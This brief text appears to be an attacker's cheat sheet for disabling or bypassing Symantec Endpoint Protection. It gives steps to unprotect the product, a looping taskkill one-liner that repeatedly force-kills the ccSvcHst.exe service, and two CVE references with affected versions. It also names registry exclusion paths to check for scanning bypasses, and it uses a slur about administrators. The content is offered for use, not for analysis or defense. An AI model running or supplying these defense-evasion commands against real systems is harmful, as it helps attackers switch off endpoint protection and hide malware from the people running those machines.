As admin launch SymCorpUi.exe and unprotect SEP in options.
for /L %n in (1,0,10) do taskkill /F /IM ccSvcHst.exe & timeout 1
CVE-2020-5825 https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825 < 14.2 RU2
CVE-2019-18372 https://www.zerodayinitiative.com/advisories/ZDI-19-990/ < 14.2 RU2 MP1
Retarded admins will sometimes allow a full bypass (extension/filename/directory):
HKLM\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions
HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\AV\Exclusions